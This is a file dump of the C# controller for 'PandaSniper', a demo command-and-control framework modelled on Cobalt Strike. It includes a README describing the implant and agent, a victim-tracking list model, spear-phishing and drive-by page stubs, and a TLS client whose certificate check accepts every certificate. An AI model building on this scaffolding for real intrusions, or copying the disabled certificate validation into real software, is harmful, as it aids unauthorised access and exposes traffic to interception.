UICulture 设置。 30 | 31 | //[assembly: NeutralResourcesLanguage("en-US", UltimateResourceFallbackLocation.Satellite)] 32 | 33 | 34 | [assembly: ThemeInfo( 35 | ResourceDictionaryLocation.None, //主题特定资源词典所处位置 36 | //(未在页面中找到资源时使用, 37 | //或应用程序资源字典中找到时使用) 38 | ResourceDictionaryLocation.SourceAssembly //常规资源词典所处位置 39 | //(未在页面中找到资源时使用, 40 | //、应用程序或任何主题专用资源字典中找到时使用) 41 | )] 42 | 43 | 44 | // 程序集的版本信息由下列四个值组成: 45 | // 46 | // 主版本 47 | // 次版本 48 | // 生成号 49 | // 修订号 50 | // 51 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值 52 | //通过使用 "*",如下所示: 53 | // [assembly: AssemblyVersion("1.0.*")] 54 | [assembly: 
AssemblyVersion("1.0.0.0")] 55 | [assembly: AssemblyFileVersion("1.0.0.0")] 56 | -------------------------------------------------------------------------------- /Master/PandaSniper/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // 此代码由工具生成。 4 | // 运行时版本: 4.0.30319.42000 5 | // 6 | // 对此文件的更改可能导致不正确的行为,如果 7 | // 重新生成代码,则所做更改将丢失。 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace PandaSniper.Properties 12 | { 13 | 14 | 15 | /// 16 | /// 强类型资源类,用于查找本地化字符串等。 17 | /// 18 | // 此类是由 StronglyTypedResourceBuilder 19 | // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。 20 | // 若要添加或删除成员,请编辑 .ResX 文件,然后重新运行 ResGen 21 | // (以 /str 作为命令选项),或重新生成 VS 项目。 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | internal class Resources 26 | { 27 | 28 | private static global::System.Resources.ResourceManager resourceMan; 29 | 30 | private static global::System.Globalization.CultureInfo resourceCulture; 31 | 32 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 33 | internal Resources() 34 | { 35 | } 36 | 37 | /// 38 | /// 返回此类使用的缓存 ResourceManager 实例。 39 | /// 40 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 41 | internal static global::System.Resources.ResourceManager ResourceManager 42 | { 43 | get 44 | { 45 | if ((resourceMan == null)) 46 | { 47 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("PandaSniper.Properties.Resources", typeof(Resources).Assembly); 
48 | resourceMan = temp; 49 | } 50 | return resourceMan; 51 | } 52 | } 53 | 54 | /// 55 | /// 覆盖当前线程的 CurrentUICulture 属性 56 | /// 使用此强类型的资源类的资源查找。 57 | /// 58 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 59 | internal static global::System.Globalization.CultureInfo Culture 60 | { 61 | get 62 | { 63 | return resourceCulture; 64 | } 65 | set 66 | { 67 | resourceCulture = value; 68 | } 69 | } 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /Master/PandaSniper/Properties/Resources.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | text/microsoft-resx 107 | 108 | 109 | 2.0 110 | 111 | 112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 113 | 114 | 115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | -------------------------------------------------------------------------------- /Master/PandaSniper/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 
8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace PandaSniper.Properties 12 | { 13 | 14 | 15 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 16 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] 17 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase 18 | { 19 | 20 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 21 | 22 | public static Settings Default 23 | { 24 | get 25 | { 26 | return defaultInstance; 27 | } 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /Master/PandaSniper/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Master/PandaSniper/SpearPhish.xaml: -------------------------------------------------------------------------------- 1 |  10 | 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Master/PandaSniper/SpearPhish.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// SpearPhish.xaml 的交互逻辑 20 | /// 21 | public partial class 
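SpearPhish : Page 22 | { 23 | public SpearPhish() 24 | { 25 | InitializeComponent(); 26 | } 27 | } 28 | } 29 |
--------------------------------------------------------------------------------
/Master/PandaSniper/SslTcpClient.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Collections;
using System.Net;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.IO;

namespace PandaSniper
{
    /// <summary>
    /// Synchronous TLS-over-TCP client: connect, send a UTF-8 message, read the reply up to
    /// the end-of-message marker, close. Failures that the class handles itself are reported
    /// through <see cref="resultMessage"/>.
    /// </summary>
    public class SslTcpClient
    {
        // End-of-message marker that terminates each server reply.
        // NOTE(review): the literal is rendered as an empty string in this listing (angle-bracket
        // text appears to have been lost); "<EOF>" is assumed from the 5-character trim the
        // original applied to the reply. Confirm against the repository.
        private const string EndOfMessageMarker = "<EOF>";

        public string machineName = null;
        public int machinePort = 443;
        public string serverName = null;
        public TcpClient tcpClient = null;
        public SslStream sslStream = null;
        public string resultMessage = null;

        //private static Hashtable certificateErrors = new Hashtable();

        /// <summary>
        /// Stores the endpoint to connect to and the name passed to the TLS handshake.
        /// </summary>
        /// <param name="machineName">Host to open the TCP connection to.</param>
        /// <param name="machinePort">TCP port on that host.</param>
        /// <param name="serverName">Target host name handed to AuthenticateAsClient.</param>
        public SslTcpClient(string machineName, int machinePort, string serverName)
        {
            this.machineName = machineName;
            this.machinePort = machinePort;
            this.serverName = serverName;
        }

        /// <summary>
        /// Certificate callback invoked through RemoteCertificateValidationDelegate.
        /// </summary>
        /// <returns>Always true.</returns>
        public static bool ValidateServerCertificate(
            object sender,
            X509Certificate certificate,
            X509Chain chain,
            SslPolicyErrors sslPolicyErrors)
        {
            // SECURITY: certificate verification is ignored. Every certificate is accepted,
            // including ones that fail chain building or name matching, so the session is
            // encrypted but the server is not authenticated and an on-path party can
            // impersonate it and read or alter the traffic.
            // Behaviour is kept because callers presumably depend on a self-signed server
            // certificate. To authenticate the server, trust or pin the expected CA or
            // certificate and return false whenever sslPolicyErrors is not None.
            // Console.WriteLine("Certificate error: {0}", sslPolicyErrors);
            return true;
        }

        /// <summary>
        /// Opens the TCP connection and performs the TLS handshake.
        /// </summary>
        /// <remarks>
        /// On a socket or authentication failure the error is written to the console and
        /// <see cref="sslStream"/> is left null, which SendMessage and ReadMessage report as
        /// code 504.
        /// </remarks>
        public void StartSslTcp()
        {
            try
            {
                // machineName is the host running the server application.
                this.tcpClient = new TcpClient(this.machineName, this.machinePort);

                // leaveInnerStreamOpen is false: closing the SslStream closes the client's stream.
                SslStream stream = new SslStream(
                    this.tcpClient.GetStream(),
                    false,
                    new RemoteCertificateValidationCallback(ValidateServerCertificate),
                    null
                    );
                stream.ReadTimeout = 5000;
                stream.WriteTimeout = 5000;
                this.sslStream = stream;

                try
                {
                    // serverName is sent as the expected certificate name, but a mismatch is
                    // not rejected because ValidateServerCertificate accepts every certificate.
                    this.sslStream.AuthenticateAsClient(serverName);
                }
                catch (AuthenticationException e)
                {
                    Console.WriteLine("Exception: {0}", e.Message);
                    if (e.InnerException != null)
                    {
                        Console.WriteLine("Inner exception: {0}", e.InnerException.Message);
                    }
                    Console.WriteLine("Authentication failed - closing the connection.");
                    this.tcpClient.Close();
                    // Drop the stream so later calls take the "no connection" path instead of
                    // writing to a closed connection.
                    this.sslStream = null;
                }
            }
            catch (SocketException ex)
            {
                Console.WriteLine(ex.Message);
            }
        }

        /// <summary>
        /// Writes <paramref name="message"/> to the server as UTF-8.
        /// </summary>
        /// <remarks>
        /// The end-of-message marker is not appended here; it has to be part of
        /// <paramref name="message"/> already.
        /// </remarks>
        /// <returns>The stream to read the reply from, or null when there is no connection
        /// (resultMessage is then set to code 504).</returns>
        public SslStream SendMessage(string message)
        {
            byte[] byte_message = Encoding.UTF8.GetBytes(message);

            if (this.sslStream == null)
            {
                this.resultMessage = "{\"code\":\"504\"}";
                return this.sslStream;
            }

            this.sslStream.Write(byte_message);
            this.sslStream.Flush();
            return this.sslStream;
        }

        /// <summary>
        /// Reads the server reply up to the end-of-message marker into resultMessage.
        /// </summary>
        /// <param name="sslStream">Stream returned by SendMessage; null yields code 504.</param>
        public void ReadMessage(SslStream sslStream)
        {
            if (sslStream == null)
            {
                this.resultMessage = "{\"code\":\"504\"}";
                return;
            }

            StringBuilder messageData = new StringBuilder();
            // One decoder for the whole reply, so a UTF-8 sequence that spans two reads is
            // decoded correctly.
            Decoder decoder = Encoding.UTF8.GetDecoder();
            byte[] buffer = new byte[2048];

            try
            {
                int markerIndex = -1;
                while (markerIndex < 0)
                {
                    int bytes = sslStream.Read(buffer, 0, buffer.Length);
                    if (bytes == 0)
                    {
                        // The peer closed the connection before sending the marker; without
                        // this check the loop would never end.
                        break;
                    }

                    char[] chars = new char[decoder.GetCharCount(buffer, 0, bytes)];
                    decoder.GetChars(buffer, 0, bytes, chars, 0);
                    messageData.Append(chars);
                    markerIndex = messageData.ToString().IndexOf(EndOfMessageMarker, StringComparison.Ordinal);
                }

                if (markerIndex < 0)
                {
                    // Incomplete reply: report it the same way as a missing connection.
                    this.resultMessage = "{\"code\":\"504\"}";
                }
                else
                {
                    // Keep everything before the marker.
                    this.resultMessage = messageData.ToString().Substring(0, markerIndex);
                }
            }
            catch (SocketException ex)
            {
                // NOTE(review): SslStream.Read reports timeouts and transport failures as
                // IOException, which this handler does not cover and which therefore reaches
                // the caller. The text below is also not valid JSON and ex.Message is inserted
                // unescaped; both are left unchanged because the consumer is not visible here.
                this.resultMessage = "{{\"code\":\"504\"},{\"error\":\"" + ex.Message + "\"}}";
            }
        }

        /// <summary>
        /// Closes the TLS stream and the TCP client if they were created.
        /// </summary>
        public void CloseSslTcp()
        {
            // Either field is null when the connection was never established.
            if (this.sslStream != null)
            {
                this.sslStream.Close();
            }
            if (this.tcpClient != null)
            {
                this.tcpClient.Close();
            }
        }
        /*
        private static void DisplayUsage()
        {
            Console.WriteLine("To start the client specify:");
            Console.WriteLine("clientSync machineName [serverName]");
            Environment.Exit(1);
        }
        public static int Main(string[] args)
        {
            string serverCertificateName = null;
            string machineName = null;
            if (args == null || args.Length < 1)
            {
                DisplayUsage();
            }
            // User can specify the machine name and server name.
            // Server name must match the name on the server's certificate.
            machineName = args[0];
            if (args.Length < 2)
            {
                serverCertificateName = machineName;
            }
            else
            {
                serverCertificateName = args[1];
            }
            SslTcpClient.RunClient(machineName, serverCertificateName);
            return 0;
        }
        */
    }
}

--------------------------------------------------------------------------------
/Master/PandaSniper/TargetListView.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Collections.Specialized;
using System.ComponentModel;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;

namespace PandaSniper
{
    /// <summary>
    /// Row model for the target list; each property setter raises PropertyChanged so bound
    /// views refresh.
    /// </summary>
    public class TargetListView : INotifyPropertyChanged
    {
        public string uid;
        public string time;
        public string country;
        public string externalIP;
        public string internalIP;
        public string pid;
        public string user;
        public string computer;
        public string arch;
        public string last;
        public event PropertyChangedEventHandler PropertyChanged;

        public string Country
        {
            get { return country; }
            set { country = value; RaisePropertyChanged("Country"); }
        }

        public string ExternalIP
        {
            get { return externalIP; }
            set { externalIP = value; RaisePropertyChanged("ExternalIP"); }
        }

        public string InternalIP
        {
            get { return internalIP; }
            set { internalIP = value; RaisePropertyChanged("InternalIP"); }
        }

        public string Pid
        {
            get { return pid; }
            set { pid = value; RaisePropertyChanged("Pid"); }
        }

        public string User
        {
            get { return user; }
            set { user = value; RaisePropertyChanged("User"); }
        }

        public string Computer
        {
            get { return computer; }
            set { computer = value; RaisePropertyChanged("Computer"); }
        }

        public string Arch
        {
            get { return arch; }
            set { arch = value; RaisePropertyChanged("Arch"); }
        }

        public string Last
        {
            get { return last; }
            set { last = value; RaisePropertyChanged("Last"); }
        }

        public TargetListView() { }

        /// <summary>
        /// Creates a row with its fields set directly; no change notification is raised.
        /// </summary>
        public TargetListView(
            string country,
            string externalIP,
            string internalIP,
            string pid,
            string user,
            string computer,
            string arch,
            string last)
        {
            this.country = country;
            this.externalIP = externalIP;
            this.internalIP = internalIP;
            this.pid = pid;
            this.user = user;
            this.computer = computer;
            this.arch = arch;
            this.last = last;
        }

        // Raises PropertyChanged for the named property when there is a subscriber.
        private void RaisePropertyChanged(string propertyName)
        {
            // Copy first so an unsubscribe on another thread cannot null the delegate between
            // the check and the call.
            PropertyChangedEventHandler handler = this.PropertyChanged;
            if (handler != null)
            {
                handler.Invoke(this, new PropertyChangedEventArgs(propertyName));
            }
        }
    }

    /// <summary>
    /// ObservableCollection whose change notifications are posted to the synchronization
    /// context captured when the collection was created.
    /// </summary>
    // NOTE(review): the type parameter is not visible in this listing (angle-bracket text
    // appears to have been lost); it is restored here because ObservableCollection is generic.
    public class AsyncObservableCollection<T> : ObservableCollection<T>
    {
        // SynchronizationContext of the thread that created the collection.
        private SynchronizationContext _synchronizationContext = SynchronizationContext.Current;

        public AsyncObservableCollection() { }
        public AsyncObservableCollection(IEnumerable<T> list) : base(list) { }

        protected override void OnCollectionChanged(NotifyCollectionChangedEventArgs e)
        {
            // No captured context (created on a thread without one) or already on the creating
            // context: raise directly, no cross-thread dispatch is needed.
            if (_synchronizationContext == null || SynchronizationContext.Current == _synchronizationContext)
            {
                RaiseCollectionChanged(e);
            }
            else
            {
                // Called from another thread, typically a non-UI thread: post the
                // notification to the creating context so the UI update runs there.
                _synchronizationContext.Post(RaiseCollectionChanged, e);
            }
        }

        private void RaiseCollectionChanged(object param)
        {
            // Runs on the creating context; call the base implementation directly.
            base.OnCollectionChanged((NotifyCollectionChangedEventArgs)param);
        }

        protected override void OnPropertyChanged(PropertyChangedEventArgs e)
        {
            if (_synchronizationContext == null || SynchronizationContext.Current == _synchronizationContext)
            {
                // Execute the PropertyChanged event on the current thread
                RaisePropertyChanged(e);
            }
            else
            {
                // Post the PropertyChanged event on the creator thread
                _synchronizationContext.Post(RaisePropertyChanged, e);
            }
        }

        private void RaisePropertyChanged(object param)
        {
            // We are in the creator thread, call the base implementation directly
            base.OnPropertyChanged((PropertyChangedEventArgs)param);
        }
    }

    /// <summary>
    /// Single-string model for the events view; setting Content raises PropertyChanged.
    /// </summary>
    public class EventsContent : INotifyPropertyChanged
    {
        public string content;
        public event PropertyChangedEventHandler PropertyChanged;

        public string Content
        {
            get { return content; }
            set
            {
                content = value;
                PropertyChangedEventHandler handler = this.PropertyChanged;
                if (handler != null)
                {
                    handler.Invoke(this, new PropertyChangedEventArgs("Content"));
                }
            }
        }
    }
}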
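/Master/PandaSniper/WebDriveBy.xaml:
--------------------------------------------------------------------------------
 1 |  10 | 11 | 12 | 13 | 14 | 15 |
--------------------------------------------------------------------------------
/Master/PandaSniper/WebDriveBy.xaml.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows;
using System.Windows.Controls;
using System.Windows.Data;
using System.Windows.Documents;
using System.Windows.Input;
using System.Windows.Media;
using System.Windows.Media.Imaging;
using System.Windows.Navigation;
using System.Windows.Shapes;

namespace PandaSniper
{
    /// <summary>
    /// Interaction logic for WebDriveBy.xaml
    /// </summary>
    public partial class WebDriveBy : Page
    {
        /// <summary>
        /// Creates the page; the only work done here is the InitializeComponent call.
        /// </summary>
        public WebDriveBy()
        {
            InitializeComponent();
        }
    }
}
--------------------------------------------------------------------------------
/Master/PandaSniper/l.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/QAX-A-Team/PandaSniper/6e838a68bfcece23772b696ea811fa33096c2366/Master/PandaSniper/l.ico
--------------------------------------------------------------------------------
/Master/PandaSniper/l.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/QAX-A-Team/PandaSniper/6e838a68bfcece23772b696ea811fa33096c2366/Master/PandaSniper/l.png
--------------------------------------------------------------------------------
/Master/PandaSniper/packages.config:
--------------------------------------------------------------------------------
 1 |  2 | 3 | 4 | 5 | 6 | 7 |
--------------------------------------------------------------------------------
/README.md: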
--------------------------------------------------------------------------------
# PandaSniper
Linux C2 框架demo,为期2周的“黑客编程马拉松”,从学习编程语言开始到实现一个demo的产物。

特别注意:此程序仅仅是demo,请勿用于实际项目。

但是我们会不定时更新,随着我们对这次新学的编程语言的更深入了解和运用,我们会不断更新和优化代码以及架构,让PandaSniper随着我们一起成长,作为我们小组技术提升的体现。

为什么叫“PandaSniper”,没有为什么,觉得熊猫狙击手比较好听,就选它了。

# 起因

我相信每一个入行(信息安全)的人都有一个木马梦,向往有一天能够骑着自己的“马儿”浪迹天涯。从红狼、上兴、大灰狼到现在的MSF、Cobaltstrike等,“马儿”的名字在不停的变化,功能在不停的优化,架构在不停的更新,抑或有些“马儿”慢慢消失在了信息安全这个小行业的历史长河里,但是它永远是“搞站”(渗透测试、红队评估等等)活动中的不可或缺的一大利器。

作为安全圈一名入行十余年的老鸟和带领的几个入行几年的新鸟,但都是编码圈的菜鸟的我们,一起达成了一个共识,我们要实现我们的“木马梦”,虽然我们2周前还不会写GO、C#、C/C++。我们不做“如果有这么一款马儿就好了的”美梦,我们自己上,成不成看天意,做不做看自己。

# 架构简述

PandaSniper使用不同编程语言,编写3个独立的组件,分为Master、Agent、Implant这3个部分。

- Master(主控端):使用C#和WPF编写,作为主要功能的展示和操作部分。

- Agent(代理端):使用GO编写,顾名思义作为Master端的代理人,接收和发出Master的各种指令以及数据。

- Implant(植入端):使用c/c++编写,用于目标主机数据获取的植入程序,并发送数据到Agent端。



数据流和协议:

Master <----(tcp/ssl)-----> Agent <----(http)----> Implant



如果你打开我们的Master界面会发现,极其像Cobaltstrike。我们整个架构和界面都是模仿的Cobaltstrike,Cobaltstrike是我目前用过的最好用的和扩展性最好的以及最稳定的C2工具。我也希望我们的PandaSniper能像Cobaltstrike一样好用,但目前相差太远(极其遥远),但我们相信未来。

# 功能

目前只有一个可能还存在bug的命令执行功能。对一些需要交互式的命令基本没有支持,功能还需大力完善。

# 依赖

- Master:.NET Framework 4.6 (Visual Studio 2019)
- Agent: 无
- Implant:libcurl4

#### 编译和安装:

- Master端使用了MaterialDesignColors和MaterialDesignThemes.Wpf(项目网址:http://materialdesigninxaml.net/),Newtonsoft.Json项目。使用Visual Studio 2019直接编译。

- Agent端依赖包
  - github.com/bitly/go-simplejson
  - github.com/dgrijalva/jwt-go
  - github.com/urfave/cli
- Implant端
  - 安装依赖:apt-get install libcurl4-gnutls-dev
  - 编译:gcc main.cpp -lcurl -lstdc++ -lpthread

# TODO

- Master端
  - 自己编写控件模板和样式,去掉MaterialDesign相关依赖
  - 更换Json使用库,去掉Newtonsoft.Json依赖
  - 利用MVVM设计模式编写界面
  - 整理C#代码
  - 完整移植Cobaltstrike v4.0所有相关操作界面
- Agent端
  - 整理规划代码
  - 完善架构功能和数据结构
  - 完善命令功能
- Implant端
  - 整理规划代码
  - 去掉libcurl4库的依赖,使用原生函数
  - 完善命令执行功能

# 截图

![](1.png)

--------------------------------------------------------------------------------